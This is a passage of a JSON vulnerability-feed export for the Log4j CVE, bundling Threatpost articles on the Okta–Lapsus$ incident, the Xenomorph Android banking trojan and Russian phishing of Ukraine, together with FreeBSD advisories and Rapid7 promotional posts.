attacks, as mentioned.\n\nAs these attacks are likely to continue, Google has expanded eligibility for [Project Shield](<https://projectshield.withgoogle.com/landing>), the company\u2019s free protection against DDoS attacks, to \u201cUkrainian government websites, embassies worldwide and other governments in close proximity to the conflict,\u201d Huntley 
wrote. More than 150 websites in Ukraine, including many news organizations, are currently using the service.\n\nProject Shield allows Google to absorb the bad traffic in a DDoS attack so the targeted organization can continue operating and defend against these attacks, according to the post. The company is recommending that eligible organizations [register](<https://support.projectshield.withgoogle.com/s/?language=en_US>) for Project Shield in the wake of increased DDoS attack activity, Huntley wrote.\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** scheduled for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-09T14:07:55", "type": "threatpost", "title": "Russian APTs Furiously Phish Ukraine \u2013 Google", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-09T14:07:55", "id": "THREATPOST:751A0E2371F134F90F39C20AB70C1E2A", "href": "https://threatpost.com/russian-apts-phishing-ukraine-google/178819/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-28T18:36:10", "description": "On Friday, Okta \u2013 the authentication firm-cum-Lapsus$-victim \u2013 admitted that it \u201cmade a mistake\u201d in handling the [recently revealed](<https://threatpost.com/lapsus-data-kidnappers-claim-snatches-from-microsoft-okta/179041/>) Lapsus$ attack. \n\nThe mistake: trusting that a service provider had told Okta everything it needed to know about an \u201cunsuccessful\u201d account takeover (ATO) at that provider, and that the attackers wouldn\u2019t reach their tentacles back to drag in Okta or its customers. \n\nWrong-o, it turned out: About a week ago, Lapsus$ bragged about having gotten itself \u201csuperuser/admin\u201d access to Okta\u2019s internal systems, gleefully posting proof and poking fun at Okta for its denials that the Jan. 20 attack had been successful. \n\nIn an [FAQ](<https://support.okta.com/help/s/article/Frequently-Asked-Questions-Regarding-January-2022-Compromise?language=en_US>) published on Friday, Okta offered a full timeline of the incident, which started on Jan. 20 when the company learned that \u201ca new factor was added to a Sitel customer support engineer\u2019s Okta account.\u201d\n\n## What Happened at Sitel \n\nThe target of the Jan. 20 attack was Sykes Enterprises, which Sitel acquired in September 2021. Okta has referred to the company as Sitel \u2013 a third-party vendor that helps Okta out on the customer-support front \u2013 in its updates and FAQ. \n\nThe threat actor failed in its attempt to add a new factor \u2013 a password \u2013 to the Okta account of one of Sitel\u2019s customer support engineers. 
Okta Security had received an alert that a new factor was added to a Sitel employee\u2019s Okta account from a new location and that the target didn\u2019t accept a multifactor authentication (MFA) challenge, which Okta said blocked the intruder\u2019s access to the Okta account. \n\nNonetheless, \u201cout of an abundance of caution,\u201d the next day \u2013 Jan. 21 \u2013 Okta reset the account and notified Sitel. On the same day, Okta Security shared indicators of compromise (IOC) with Sitel, which told Okta that it had retained outside support from \u201ca leading forensic firm.\u201d\n\nAccording to the full report that Sitel commissioned, the threat actor had access to Sitel\u2019s systems for a five-day window, from Jan. 16-21: dates that back up the screenshots that Lapsus$ posted on March 21. \n\nDuring the five-day window wherein it had access to Sitel, the attacker\u2019s only action was the attempted password reset.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/28140124/Screen-Shot-2022-03-28-at-1.59.44-PM-1-e1648490538671.png>)\n\nTimeline of Okta hack. Source: Okta.\n\n## How Okta Screwed Up\n\nAs far as why Okta didn\u2019t notify customers when it learned of the ATO attack in January, it acknowledged on Friday that \u201cwe made a mistake.\u201d \n\n\u201cSitel is our service provider for which we are ultimately responsible,\u201d it admitted in the Friday FAQ. \n\nYou can\u2019t know what you don\u2019t know, though: \u201cIn January, we did not know the extent of the Sitel issue \u2013 only that we detected and prevented an account takeover attempt and that Sitel had retained a third party forensic firm to investigate,\u201d Okta said. \u201cAt that time, we didn\u2019t recognize that there was a risk to Okta and our customers. 
We should have more actively and forcefully compelled information from Sitel.\u201d\n\nCoulda, woulda, shoulda, it said: \u201cIn light of the evidence that we have gathered in the last week, it is clear that we would have made a different decision if we had been in possession of all of the facts that we have today.\u201d\n\nIt must be a painful mea culpa: Okta\u2019s share price had dropped nearly 15 percent as of Friday. As the Wall Street Journal [reported](<https://www.wsj.com/articles/okta-faces-long-road-back-11648211400>), that\u2019s a common reaction after major cyberattacks, such as those at SolarWinds, Mimecast and Mandiant, all of which saw shares slide after they reported their own incidents. \n\nThe WSJ\u2019s headlines say it all: \u201cIdentity-management company has strong market position, but business impact of recent hack won\u2019t be clear for a while,\u201d the business daily said on Friday, predicting that \u201cOkta Faces Long Road Back.\u201d \n\n## Potential Extent of Compromise\n\nIn its Friday FAQ, Okta said that, as detailed in [its blog](<https://www.okta.com/blog/2022/03/oktas-investigation-of-the-january-2022-compromise/>), the company has already identified and contacted 366 potentially affected customers. The Okta service itself was not breached, it said: \u201cThere is no impact to Auth0 or AtSpoke customers, and there is no impact to HIPAA and FedRAMP customers.\u201d\n\nAs such, customers don\u2019t have to reset passwords, Okta said: \u201cWe are confident in our conclusions that the Okta service has not been breached and there are no corrective actions that need to be taken by our customers.\n\n\u201cWe are confident in this conclusion because Sitel (and therefore the threat actor who only had the access that Sitel had) was unable to create or delete users, or download customer databases.\u201d\n\nThat lack of access is by design, Okta explained. 
\u201cIn assessing the potential extent of the compromise, it is important to remember that by design, Sitel\u2019s support engineers have limited access. They are unable to create or delete users, or download customer databases. Support engineers are able to facilitate the resetting of passwords and multi-factor authentication factors for users, but are unable to choose those passwords. In other words, an individual with this level of access could repeatedly trigger a password reset for users, but would not be able to log in to the service.\u201d\n\nBesides its attack on Okta, the precocious Lapsus$ gang \u2013 a group of data extortionists potentially [thinned out](<https://threatpost.com/uk-cops-collar-7-suspected-lapsus-gang-members/179098/>) by London police having collared seven suspected members last week \u2013 also posted some of Microsoft\u2019s source code and data about internal projects and systems around the same time as it shared Okta screenshots.\n\n## How Much Should We Blame Okta?\n\nSecurity specialists aren\u2019t jumping to blame Okta for its admitted \u201cmistake.\u201d The thinking: There but for the grace of God go us. \n\nAfter all, ATOs are common. How should an organization know which ones to consider as worthy of close inspection, and when should they follow up with a deeper dive to ensure the attempt wasn\u2019t successful? \n\nSounil Yu, chief information security officer at JupiterOne \u2013 provider of cyber asset management and governance technology \u2013 told Threatpost on Monday that these intrusions (or, rather, attempted intrusions, as the case may be) occur regularly, but the \u201cvast majority\u201d are beaten back before they have a serious impact or lead to further incidents.\n\n\u201cIt\u2019s easy in hindsight to understand the true severity of an incident, but hard in the present time,\u201d he said via email. 
\n\nChris Morgan, senior cyber threat intelligence analyst at digital risk protection firm Digital Shadows, explained that ATOs are \u201cincredibly common\u201d due to a combination of the effectiveness and availability of brute-force cracking tools and threat actors\u2019 ability to sell stolen accounts on cybercriminal forums. \n\n## What Should Trigger a Report?\n\nThe question of whether certain incidents are material enough to report \u201ccan be more art than science,\u201d Yu said. But the Okta case will probably cause many organizations to reconsider what ratings and thresholds they\u2019re applying to such incidents, he surmised, \u201cso that we are not seen as negligent in meeting our reporting obligations.\u201d\n\nKnowing when to conduct a more robust investigation depends on what facts are uncovered during the incident management process, along with the risk associated with the targeted account, Morgan said via email. \u201cAn account with significant privileges should be treated with a higher priority than those that [have] limited functionality,\u201d he advised.\n\nInitial triage of ATO attacks aims to identify key facts about what activity the account has been involved in, to accurately determine the risk and next steps, Morgan said. \u201cThis is typically done by checking authentication logs and observing login activity and includes spotting whether the account has attempted to login to additional services, changed any passwords, or downloaded external material,\u201d he continued. \u201cIt also includes activity that may have an impact on the overall risk, like whether the account has accessed sensitive data or attempted to establish persistence.\u201d\n\n## No \u2018God-like Access\u2019 Was Gained\n\nWhen the Okta breach first came to light, there was concern about a \u201csuperuser\u201d app pictured in Lapsus$ screenshots. Okta clarified on Friday that this was no \u201cSuper Admin\u201d account, as had been feared initially. 
Rather, it\u2019s an in-house application \u2013 known as SuperUser or SU \u2013 used by support staff to handle most queries. \n\n\u201cThis does not provide \u201cgod-like access\u201d to all its users,\u201d Okta Chief Security Officer David Bradbury explained. \u201cThis is an application built with least privilege in mind to ensure that support engineers are granted only the specific access they require to perform their roles.\u201d\n\nSpecifically, SuperUser engineers can\u2019t create or delete users or download customer databases. \n\nWhat SuperUsers can do: \u201cSupport engineers do have access to limited data \u2013 for example, Jira tickets and lists of users \u2013 that were seen in the screenshots,\u201d Bradbury clarified. \u201cSupport engineers are also able to facilitate the resetting of passwords and MFA factors for users, but are unable to obtain those passwords.\u201d\n\nThe fact that the Sitel account Lapsus$ took over was reportedly built with the principle of least privilege in mind \u201cshould have minimized the data and services that Lapsus$ were able to view,\u201d Morgan said, in response to Threatpost asking what Okta did right. \n\n\u201cOkta should also be praised for how quickly they identified and worked to lock down the compromised account,\u201d he added. \n\nHowever, clearly, that timeliness didn\u2019t extend to the forensic reporting and communication of the incident, as Okta itself has now admitted. \n\n**_Moving to the cloud? 
Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-28T18:28:34", "type": "threatpost", "title": "Okta Says It Goofed in Handling the Lapsus$ Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-28T18:28:34", "id": "THREATPOST:C9D2DB62AC17B411BFFF253D149E56F2", "href": "https://threatpost.com/okta-goofed-lapsus-attack/179129/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-22T18:08:28", "description": "An Android trojan dubbed Xenomorph has nested in Google Play, already racking up more than 50,000 downloads from the official app store, researchers warned. 
For anyone who downloaded the \u201cFast Cleaner\u201d app, it\u2019s time to nuke it from orbit.\n\nAccording to a ThreatFabric analysis, Xenomorph has a target list of 56 different European banks, for which it provides convincing facsimiles of log-in pages whenever a victim attempts to log into a mobile banking app. The goal of course is to steal any credentials that victims enter into the faux log-in overlay.\n\nHowever, the malware is also a flexible, modular banking trojan, which has code overlaps and other ties to the Alien malware \u2013 hence the name. It notably contains the ability to abuse Android\u2019s accessibility services for broad control over a device\u2019s capabilities, which could open the door to dangerous features that go beyond hijacking mobile banking credentials.\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE!\n\n\u201cThe Accessibility engine powering this malware, together with the infrastructure and command-and-control (C2) protocol, are carefully designed to be scalable and updatable,\u201d the researchers warned in a [Monday posting](<https://www.threatfabric.com/blogs/xenomorph-a-newly-hatched-banking-trojan.html>). \u201cThe information stored by the logging capability of this malware is very extensive, and if sent back to the C2 server, could be used to implement keylogging, as well as collecting behavioral data on victims and on installed applications, even if they are not part of the list of targets.\u201d\n\nThat advanced functionality is not yet implemented, so the researchers have deemed Xenomorph as still under development. However, they noted that it\u2019s already making a mark on the banking trojan front: \u201cXenomorph is already sporting effective overlays [for banking apps] and being actively distributed on official app stores.\u201d\n\nIt also uses SMS and notification-interception to log and use potential two-factor authentication (2FA) tokens, according to ThreatFabric. 
And, they added, \u201cIt would be unsurprising to see this bot sport semi-automatic transfer system (ATS) capabilities in the very near future.\u201d\n\nATS is the process of automatically initiating wire transfers from victims without needing to use credentials, thus bypassing 2FA and all anti-fraud measures.\n\nThreatFabric observed the malware being loaded by a dropper hiding in a Google Play application called \u201cFast Cleaner\u201d (since reported to Google). Sporting 50,000 installations, it purported to remove unused clutter and battery optimization blocks for better device processing times.\n\n\u201cThis is not an uncommon lure, and we have seen malware families like Vultur and Alien being deployed by such application[s],\u201d the researchers said.\n\n## **Inside the Shell: Xenomorph\u2019s Core Functionality**\n\nIn terms of its main overlay attack vector, Xenomorph is powered by Accessibility Services privileges, the researchers found.\n\n\u201cOnce the malware is up and running on a device, its background services receive Accessibility events whenever something new happens on the device,\u201d they explained in a Monday posting. \u201cIf the application opened is part of the list of targets, then Xenomorph will trigger an overlay injection and show a WebView Activity posing as the targeted package.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/22123754/Alien-xenomorph-scaled-e1645551511463.jpeg>)\n\nMore specifically, once installed, the malware enumerates and sends back a list of installed packages on the infected device. 
Based on what targeted applications are present, it goes on to download the corresponding overlays to inject.\n\n\u201cThe list of overlay targets returned by Xenomorph includes targets from Spain, Portugal, Italy and Belgium, as well as some general purpose applications like emailing services, and cryptocurrency wallets,\u201d according to ThreatFabric.\n\nAfter obtaining Accessibility Services privileges, Xenomorph will first register and verify itself with the C2, by sending a request using the legitimate, open-source project Retrofit2 (a type-safe REST client for Android, Java and Kotlin developed by Square).\n\nThat first message contains the initial information exfiltrated about the device, according to ThreatFabric. After that, Xenomorph periodically polls for new commands from the C2.\n\nFor now, the commands allow the malware to log SMS messages, list the web injects sent by the C2, enable or disable notification interception, and enumerate installed apps.\n\nMeanwhile, the malware also performs the aforementioned logging: \u201cAll the information gathered is only displayed on the local device logs, but in the future a very minor modification would be enough to add keylogging and Accessibility logging capabilities to the malware,\u201d researchers warned.\n\n## **Part of the Alien Franchise?**\n\nThreatFabric\u2019s analysis uncovered evidence of code reuse that links Xenomorph to the known Alien malware, which is a descendant of the [infamous Cerberus malware](<https://threatpost.com/cerberus-banking-trojan-unleashed-google-play/157218/>).\n\nThe overlaps include the \u201cuse of the same HTML resource page to trick victims into granting the Accessibility Services privileges.\u201d And further, Xenomorph tracks state through the \u201cSharedPreferences\u201d file.\n\n\u201cThis file is commonly used to track the state of an application,\u201d researchers noted. 
\u201cHowever, the style of variable naming used by Xenomorph is very reminiscent of Alien, despite being potentially even more detailed.\u201d\n\nThey added, \u201cpotentially the most interesting fact is the actual name of the sharedPreferences file used to store the configuration for Xenomorph: the file is named ring0.xml. This might look like any other generic random string, but it happens to coincide with the name of the supposed actor behind the development of the original Alien malware.\u201d\n\nEven though for now Xenomorph is a fairly typical banking trojan, ThreatFabric noted that it does have untapped potential.\n\n\u201cModern banking malware is evolving at a very fast rate, and criminals are starting to adopt more refined development practices to support future updates,\u201d researchers concluded. \u201cXenomorph is at the forefront of this change\u2026ThreatFabric predicts that with some more time to finish development, this malware could reach higher threat levels, comparable to other modern Android banking trojans.\u201d\n\n_**Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>), \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, will focus on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. 
[REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be **_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-22T18:00:30", "type": "threatpost", "title": "Xenomorph Malware Burrows into Google Play Users, No Facehugger Required", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-22T18:00:30", "id": "THREATPOST:FC38FE49CDC6DFAD4E78D669DBFA5687", "href": "https://threatpost.com/xenomorph-malware-google-play-facehugger/178563/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:30", "description": "\n\nServiio reports:\n\nServiio is affected by the log4j vulnerability.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": 
"NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T00:00:00", "type": "freebsd", "title": "serviio -- affected by log4j vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T00:00:00", "id": "1EA05BB8-5D74-11EC-BB1E-001517A2E1A4", "href": "https://vuxml.freebsd.org/freebsd/1ea05bb8-5d74-11ec-bb1e-001517a2e1a4.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-19T15:51:30", "description": "\n\nApache Software Foundation repos:\n\nApache Log4j2 JNDI features do not protect against attacker\n controlled LDAP and other JNDI related endpoints. 
An attacker\n who can control log messages or parameters can execute arbitrary\n code from attacker-controlled LDAP servers when message lookup\n substitution is enabled.\n \n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T00:00:00", "type": "freebsd", "title": "graylog -- include log4j patches", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T00:00:00", "id": "3FADD7E4-F8FB-45A0-A218-8FD6423C338F", "href": "https://vuxml.freebsd.org/freebsd/3fadd7e4-f8fb-45a0-a218-8fd6423c338f.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2022-03-09T17:28:27", "description": "\n\nThe world of the cloud never stops moving \u2014 so neither can cloud security. 
In the face of rapidly evolving technology and a constantly changing threat landscape, keeping up with all the latest developments, trends, and best practices in this emerging practice is more vital than ever.\n\nEnter Rapid7\u2019s [third annual Cloud Security Summit](<https://www.rapid7.com/info/events-2022/rapid7-cloud-security-summit/>), which we\u2019ll be hosting this year on Tuesday, March 29. This one-day virtual event is dedicated to [cloud security best practices](<https://www.rapid7.com/fundamentals/cloud-network-security/>) and will feature industry experts from Rapid7, as well as Amazon Web Services (AWS), Snyk, and more. \n\nWhile the event is fully virtual and free, we know that the time commitment can be the most challenging part of attending a multi-hour event during the workday. With that in mind, we\u2019ve compiled a short list of the top reasons you\u2019ll definitely want to register, clear your calendar, and attend this event.\n\n## Reason 1: Get a sneak peek at some original cloud security research\n\nDuring the opening session of this year\u2019s summit, two members of Rapid7\u2019s award-winning security research team will be presenting some never-before-published research on the current state of cloud security operations, the [most common misconfigurations in 2021](<https://www.rapid7.com/info/2021-cloud-misconfigurations-research-report/>), [Log4j](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>), and more.\n\nAlong with being genuinely interesting data, this research will also give you some insights and benchmarks that will help you evaluate your own [cloud security program](<https://www.rapid7.com/fundamentals/cloud-security/>), and prioritize the most commonly exploited risks in your organization's environment.\n\n## Reason 2: Learn from industry experts, and get CPE credits\n\nAlong with a handful of team members from Rapid7\u2019s own cloud security practice, this year\u2019s summit includes a host of subject matter 
experts from across the industry. You can look forward to hearing from Merritt Baer, Principal in the Office of the CISO at Amazon Web Services; Anthony Seto, Field Director for Cloud Native Application Security at Snyk; Keith Hoodlet, Code Security Architect at GitHub; and more. And that doesn\u2019t even include the InsightCloudSec customers who will be joining to share their expert perspectives as well.\n\nWhile learning and knowledge gain are clearly the most important aspects here, it\u2019s always great to have something extra to show for the time you devoted to an event like this. To help make the case to your management that this event is more than worth the time you\u2019ll put in, we\u2019ve arranged for all attendees to earn 3.5 continuing professional education (CPE) credits to go toward maintaining or upgrading security certifications, such as [CISSP](<https://www.isc2.org/Certifications/CISSP#>), [CISM](<https://www.isaca.org/credentialing/cism/maintain-cism-certification>), and more. \n\n## Reason 3: Be the first to hear exciting Rapid7 announcements\n\nLast but not least, while the event is primarily focused on cloud security research, strategies, and thought leadership, we are also planning to pepper in some exciting news related to [InsightCloudSec](<https://www.rapid7.com/products/insightcloudsec/>), Rapid7\u2019s cloud-native security platform. \n\nWe\u2019ll end the day with a demonstration of the product, so you can see some of our newest capabilities in action. Whether you're already an InsightCloudSec customer, or considering a new solution for uncovering misconfigurations, automating cloud security workflows, shifting left, and more, this is the best way to get a live look at one of the top solutions available in the market today. \n\nSo what are you waiting for? 
Come join us, and let\u2019s dive into the latest and greatest in cloud security together.\n\n#### Join our 2022 Cloud Security Summit\n\n[Register Now](<https://www.rapid7.com/info/events-2022/rapid7-cloud-security-summit/>)\n\n \n\n\n \n**_Additional reading_**\n\n * _[Cloud Security and Compliance: The Ultimate Frenemies of Financial Services](<https://www.rapid7.com/blog/post/2022/02/17/cloud-security-and-compliance-the-ultimate-frenemies-of-financial-services/>)_\n * _[Stay Ahead of Threats With Cloud Workload Protection](<https://www.rapid7.com/blog/post/2021/12/10/stay-ahead-of-threats-with-cloud-workload-protection/>)_\n * _[InsightCloudSec Supports 12 New AWS Services Announced at re:Invent](<https://www.rapid7.com/blog/post/2021/12/06/insightcloudsec-supports-12-new-aws-services-announced-at-re-invent/>)_\n * _[Kubernetes Guardrails: Bringing DevOps and Security Together on Cloud](<https://www.rapid7.com/blog/post/2021/12/06/kubernetes-guardrails-bringing-devops-and-security-together-on-cloud/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-09T17:06:13", "type": "rapid7blog", "title": "3 Reasons to Join Rapid7\u2019s Cloud Security Summit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-09T17:06:13", "id": "RAPID7BLOG:45B045D2EE21432DF9939E4402522BFC", "href": "https://blog.rapid7.com/2022/03/09/3-reasons-to-join-rapid7s-cloud-security-summit/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-19T19:35:50", "description": "\n\nThe world of cybersecurity never has a dull moment. While we are still recovering from the aftermath of [Log4Shell](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>), the recent [ContiLeaks](<https://www.rapid7.com/blog/post/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/>) exposed multiple vulnerabilities that have been exploited by the Conti ransomware group. It\u2019s critical for your team to identify the risk posed by such vulnerabilities and implement necessary remediation measures. As you will see, the product updates our vulnerability management (VM) team has made to [InsightVM](<https://www.rapid7.com/products/insightvm/>) and [Nexpose](<https://www.rapid7.com/products/nexpose/>) in the last quarter will empower _you_ to stay in charge \u2014 not the vulnerabilities.\n\nBut that\u2019s not all we\u2019ve improved on. We\u2019ve increased the scope of vulnerabilities tracked by incorporating [CISA\u2019s known exploited vulnerabilities (KEV)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) in the Threat Feed, usability enhancements, targeted reporting and scanning, and Log4Shell mitigation checks. And we\u2019ve released our annual [Vulnerability Intelligence Report](<https://www.rapid7.com/products/insightvm/vulnerability-report-hub-page/>) to help you make sense of the vulns that impacted us last year and understand the trends that we will all be facing this year. 
Our team also offers practical guidance to help the security teams better protect themselves.\n\nLet\u2019s dive into the key feature releases and updates on the vulnerability management front for Q1 2022.\n\n## [InsightVM] ContiLeaks Helpful Query to easily detect ContiLeaks vulns and ensure compliance\n\nCISA\u2019s KEV catalog is part of the agency\u2019s [binding operative directive](<https://www.cisa.gov/binding-operational-directive-22-01>) that has reporting requirements for federal agencies and civilian contractors. The recent ContiLeaks revealed over 30 vulns that are now a part of CISA\u2019s KEV. While users could always build a query in IVM to identify these vulns, doing so is time-consuming and can be prone to error. The ContiLeaks Helpful Query takes out the manual effort and lets customers easily locate 30+ ContiLeaks vulnerabilities in their environments. When the query is loaded into our Specific Vulnerability Dashboard template, it can give an at-a-glance view of the company\u2019s risk posture as it relates to the Conti threat. In addition to helping customers identify the exploited vulnerabilities in their environment, the update will also help them stay within the bounds of CISA\u2019s operative directive.\n\n\n\n\n\n## [InsightVM] Threat feed dashboard now includes CISA\u2019s KEV catalog\n\nWhile we are on the topic of CISA, you will be excited to learn that we have expanded the scope of vulnerabilities tracked to incorporate CISA\u2019s KEV catalog in the InsightVM [Threat Feed Dashboard](<https://www.rapid7.com/blog/post/2017/06/13/live-threat-driven-prioritization/>), including the **Assets With Actively Targeted Vulnerabilities** card and the **Most Common Actively Targeted Vulnerabilities** card. The CISA inclusion makes it easy to see how exposed your 